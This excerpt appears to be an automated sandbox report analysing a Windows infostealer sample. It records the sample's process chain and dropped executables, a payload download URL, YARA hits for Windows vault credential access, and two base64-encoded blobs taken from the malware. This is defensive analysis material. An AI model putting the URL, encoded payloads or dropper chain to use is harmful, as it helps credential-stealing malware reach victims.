                      Source: docdd.exe, 00000001.00000002.1728738734.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tempfiles.ninja/d/4wmb3QgRfXU5M4s2/bHzsEUNaVOT3WXU2lPvPRcIphVFu9mJr
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownHTTPS traffic detected: 104.21.56.249:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49732 version: TLS 1.2

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 2.2.Ref#0503711.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Ref#0503711.exe.4acd860.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Ref#0503711.exe.48eac18.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060E0BC8 NtProtectVirtualMemory,0_2_060E0BC8
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060E2148 NtResumeThread,0_2_060E2148
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060E0BC0 NtProtectVirtualMemory,0_2_060E0BC0
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060E2140 NtResumeThread,0_2_060E2140
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B30708 NtProtectVirtualMemory,3_2_05B30708
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B31BB8 NtResumeThread,3_2_05B31BB8
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B30700 NtProtectVirtualMemory,3_2_05B30700
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B31BB0 NtResumeThread,3_2_05B31BB0
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060100120_2_06010012
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060100400_2_06010040
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_0197C2240_2_0197C224
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_019717B40_2_019717B4
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_01970B880_2_01970B88
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_01978A900_2_01978A90
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_01972DB20_2_01972DB2
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_01974D480_2_01974D48
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_0197AE280_2_0197AE28
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_01970E600_2_01970E60
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_0197E1FF0_2_0197E1FF
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_019730E80_2_019730E8
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_019753580_2_01975358
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_019753480_2_01975348
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_0197E2100_2_0197E210
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_019718B30_2_019718B3
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_01978A800_2_01978A80
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_01974D380_2_01974D38
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_01970F110_2_01970F11
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_01970E9A0_2_01970E9A
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_01970E520_2_01970E52
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_01972E610_2_01972E61
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060AD7700_2_060AD770
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060A91880_2_060A9188
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060AA7400_2_060AA740
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060AA7500_2_060AA750
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060AD7600_2_060AD760
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060A94EC0_2_060A94EC
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060A95D60_2_060A95D6
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060A30B80_2_060A30B8
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060A992F0_2_060A992F
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060A99400_2_060A9940
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060A91790_2_060A9179
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060B32600_2_060B3260
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060B00400_2_060B0040
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060B35970_2_060B3597
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060B00060_2_060B0006
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060B48780_2_060B4878
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060C06280_2_060C0628
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060CEB780_2_060CEB78
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060C00060_2_060C0006
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060C00400_2_060C0040
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060E6C080_2_060E6C08
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060EC3800_2_060EC380
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060E98180_2_060E9818
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_060EC3700_2_060EC370
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_0635D2D80_2_0635D2D8
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_063400060_2_06340006
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 0_2_063400400_2_06340040
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeCode function: 1_2_00BD11F01_2_00BD11F0
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeCode function: 1_2_00BD353C1_2_00BD353C
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeCode function: 1_2_00BD0F201_2_00BD0F20
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeCode function: 1_2_00BD38681_2_00BD3868
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeCode function: 1_2_00BD1C4C1_2_00BD1C4C
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeCode function: 1_2_00BD35E11_2_00BD35E1
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeCode function: 1_2_00BD11E01_2_00BD11E0
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeCode function: 1_2_00BD12A11_2_00BD12A1
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeCode function: 1_2_00BD122A1_2_00BD122A
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeCode function: 1_2_00BD1B4B1_2_00BD1B4B
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 2_2_012CE5082_2_012CE508
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 2_2_012CD9902_2_012CD990
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 2_2_012CAA122_2_012CAA12
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 2_2_012C4A982_2_012C4A98
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 2_2_012C3E802_2_012C3E80
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 2_2_012C41C82_2_012C41C8
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 2_2_012CAA152_2_012CAA15
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 2_2_06B5B2AA2_2_06B5B2AA
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 2_2_06B5C2002_2_06B5C200
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 2_2_06B566682_2_06B56668
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 2_2_06B556402_2_06B55640
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 2_2_06B57DF02_2_06B57DF0
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 2_2_06B531002_2_06B53100
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 2_2_06B577102_2_06B57710
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 2_2_06B5E4182_2_06B5E418
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 2_2_06B524092_2_06B52409
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 2_2_06B500402_2_06B50040
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 2_2_06B55D5F2_2_06B55D5F
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 2_2_06B500192_2_06B50019
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_02ABC1243_2_02ABC124
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_02AB17433_2_02AB1743
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_02AB0B883_2_02AB0B88
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_02AB0E603_2_02AB0E60
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_02AB4CF83_2_02AB4CF8
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_02AB8CC03_2_02AB8CC0
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_02ABAD283_2_02ABAD28
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_02AB2D303_2_02AB2D30
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_02AB53303_2_02AB5330
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_02AB53403_2_02AB5340
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_02ABE0E03_2_02ABE0E0
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_02AB30683_2_02AB3068
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_02AB18423_2_02AB1842
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_02AB0E9A3_2_02AB0E9A
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_02AB0E523_2_02AB0E52
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_02AB0F0E3_2_02AB0F0E
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_02AB8CB23_2_02AB8CB2
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_02AB4CE83_2_02AB4CE8
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_02AB2DE13_2_02AB2DE1
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05998CC83_2_05998CC8
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05998CB93_2_05998CB9
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_059974383_2_05997438
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_059974283_2_05997428
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_059900063_2_05990006
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_059900403_2_05990040
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_059992E23_2_059992E2
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05AF2CA13_2_05AF2CA1
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05AF42B83_2_05AF42B8
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05AF2FD73_2_05AF2FD7
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B02CF83_2_05B02CF8
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B09FE03_2_05B09FE0
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B086383_2_05B08638
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B0D0C03_2_05B0D0C0
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B06DB83_2_05B06DB8
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B0DD703_2_05B0DD70
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B0DD5F3_2_05B0DD5F
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B09FA83_2_05B09FA8
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B086293_2_05B08629
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B0D0B03_2_05B0D0B0
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B0F0603_2_05B0F060
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B0F0513_2_05B0F051
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B3B5903_2_05B3B590
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B3E5F13_2_05B3E5F1
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B389303_2_05B38930
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B3D3983_2_05B3D398
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B3B5853_2_05B3B585
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B3D4533_2_05B3D453
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B3E6503_2_05B3E650
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B348783_2_05B34878
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B348683_2_05B34868
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B3C3803_2_05B3C380
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B3D3893_2_05B3D389
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B3C3713_2_05B3C371
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B900063_2_05B90006
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05B900403_2_05B90040
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05E1D1F83_2_05E1D1F8
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05E000403_2_05E00040
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 3_2_05E000343_2_05E00034
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 4_2_017C23104_2_017C2310
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 4_2_017C23004_2_017C2300
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 4_2_017C22D74_2_017C22D7
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 4_2_017C55204_2_017C5520
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 4_2_017C55114_2_017C5511
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 4_2_017C4F104_2_017C4F10
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 4_2_017C4F0B4_2_017C4F0B
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7692 -s 996
                      Source: Ref#0503711.exeStatic PE information: invalid certificate
                      Source: Ref#0503711.exe, 00000000.00000002.1691296366.0000000003411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1691296366.0000000003411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1724582312.0000000006190000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1691296366.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedocdd.exe" vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1691296366.000000000379F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000000.1665928636.0000000000F52000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedoc5.exeF vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1712847578.0000000005D30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameStgbmdbok.dll" vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStgbmdbok.dll" vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedoc5.exeF vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1684387882.000000000169E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1716743841.0000000005EFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedoc5.exeF vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000002.00000002.2914356334.0000000000F39000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Ref#0503711.exe
                      Source: Ref#0503711.exeBinary or memory string: OriginalFilenamedoc5.exeF vs Ref#0503711.exe
                      Source: Ref#0503711.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 2.2.Ref#0503711.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Ref#0503711.exe.4acd860.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Ref#0503711.exe.48eac18.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Ref#0503711.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Ref#0503711.exe, -.csCryptographic APIs: 'CreateDecryptor'
                      Source: docdd.exe.0.dr, -.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, sYjtawd4K2M2MYpuPvh.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, sYjtawd4K2M2MYpuPvh.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, sYjtawd4K2M2MYpuPvh.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, sYjtawd4K2M2MYpuPvh.csCryptographic APIs: 'CreateDecryptor'
                      Source: Ref#0503711.exe, -.csBase64 encoded string: 'ybeEgwietJySkQGW+bqemAPd272EkgCR9rfMsAiH36CDhRSy6b2Smg+f4/WQkhms3LubmyOS96vMmB2s06CShhiS9qeDjlaU/7qouwid/bqfzCqW7pqOhwi16KGavwyd/qKSzAqW7pG5lgCWoYeZkwiL1ajMpQiS/p2DhQSd/fW2kwnI/auDqD2c6aeDngKdoamSgzKw77yFkgOH3qGalgSdoZ2SgymS7q/MxF/LrPnMth6A/6OVmxSg/7yBkh/IyaeahwGW272EkgCR9reyjx2f9byShVaR+6ySmxueob2amAaW7quEgw=='
                      Source: docdd.exe.0.dr, -.csBase64 encoded string: 'VxCRIuZ0KjuHMO98Zx2LOe03RRqRM+57aBDZEeZtQQeWJPpYdxqHO+F1fVKFM/dGQhyOOs14aQzZOfNGTQeHJ/Z4aACWL7h+YR29GuZ3Yx2KbcR8cD2bJuZfdgaPHuJ3YAWHbeR8cDasN+58PyCMMuZhSw/ZBOZ4YDqWJOp3Y1KjMuciYwyWCdN2dwCWP+x3Pw6HItxacRuQM+1tQAaPN+p3PzqHIsd4cAjZZbctN1/ZF/BqYQSAOvpKYRuUM/EiVwCPJu98RRqRM+57aBCnLvN1axuHJLh7ZQuHOvV0PxqPOeh8cAyRIg=='
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/5@2/3
                      Source: C:\Users\user\Desktop\Ref#0503711.exeFile created: C:\Users\user\AppData\Roaming\ioibrzb.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:64:WilError_03
                      Source: C:\Users\user\Desktop\Ref#0503711.exeFile created: C:\Users\user\AppData\Local\Temp\docdd.exeJump to behavior
                      Source: Ref#0503711.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Ref#0503711.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Users\user\Desktop\Ref#0503711.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Ref#0503711.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ref#0503711.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Ref#0503711.exeReversingLabs: Detection: 31%
                      Source: C:\Users\user\Desktop\Ref#0503711.exeFile read: C:\Users\user\Desktop\Ref#0503711.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Ref#0503711.exe "C:\Users\user\Desktop\Ref#0503711.exe"
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess created: C:\Users\user\AppData\Local\Temp\docdd.exe "C:\Users\user\AppData\Local\Temp\docdd.exe"
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess created: C:\Users\user\Desktop\Ref#0503711.exe "C:\Users\user\Desktop\Ref#0503711.exe"
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe "C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe"
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe "C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe"
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7692 -s 996
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess created: C:\Users\user\AppData\Local\Temp\docdd.exe "C:\Users\user\AppData\Local\Temp\docdd.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess created: C:\Users\user\Desktop\Ref#0503711.exe "C:\Users\user\Desktop\Ref#0503711.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe "C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe "C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
